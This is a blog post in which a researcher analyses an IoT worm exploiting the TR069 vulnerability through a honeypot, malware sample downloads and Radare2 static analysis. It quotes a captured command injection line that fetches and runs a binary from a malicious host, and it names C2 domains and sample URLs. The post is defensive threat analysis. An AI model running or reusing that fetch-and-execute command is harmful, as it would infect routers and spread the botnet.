TL;DR- A wormable exploit for the recently published TR069 is being actively exploited. I pulled down some samples and hacked together a goofy way to perform dynamic analysis with Docker, Qemu, and Tcpdump. The C2 domains are tr069[.]support and tr069[.]online .
There are several different botnets propogating this worm. I'm only going to document one of them in this post. Also I haven't written a blog post in like a year so here goes nothing.
A few articles have crossed my news feeds about the recent TR069 vulnerability. Including the following-
I figured I'd whip up a web server on a machine I had laying around (something like a raspberry pi) and forward TCP port 7547 through my router, as well as a sniffer for any funky stuff.
Within about five minutes I was getting hits. The malicious requests have already been documented by some of the aforementioned posts, but the requests look something like this:
[code]POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
[/code] Notice the not-so-subtle command injection in this line-
[code]`cd /tmp;wget http://srrys.pw/1;chmod 777 1;./1`[/code] So I routed curl through Tor and downloaded the sample. Also, having reversed a decent amount of shitty IOT worms in my day I went on a hunch and requested hxxp://srrys[.]pw/2 through hxxp://srrys[.]pw/10 as well and got more hits.
[code]$ file *
1: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
2: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
3: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
4: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
5: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
6: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
7: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped[/code] ...with the following SHA256 hashes...
5d4e46b3510679dc49ce295b7f448cd69e952d80ba1450f6800be074992b07cc 7[/code] If you've ever tracked IOT threats before this will be a familiar sight. Lots of malware cross compiles for lots of different architectures, like in this example .
Lets do some basic static analysis. This is usually where I'd bust out my IDA Pro but some fucker stole my laptop recently and I haven't gotten my new license yet. So instead we're going to use Radare2, something equally cool but less familiar to me. Shouts out to the R2 team. Keep doing God's work.
[code]$ r2 1
Warning: Cannot initialize dynamic strings
-- Change the graph block definition with graph.callblocks, graph.jmpblocks, graph.flagblocks
[x] Analyze all flags starting with sym. and entry0 (aa)[/code] I run the aa command to analyze the code/functions, followed by pdf @main to disassemble main in the regular mode and V @main + space bar to disassemble in visual mode.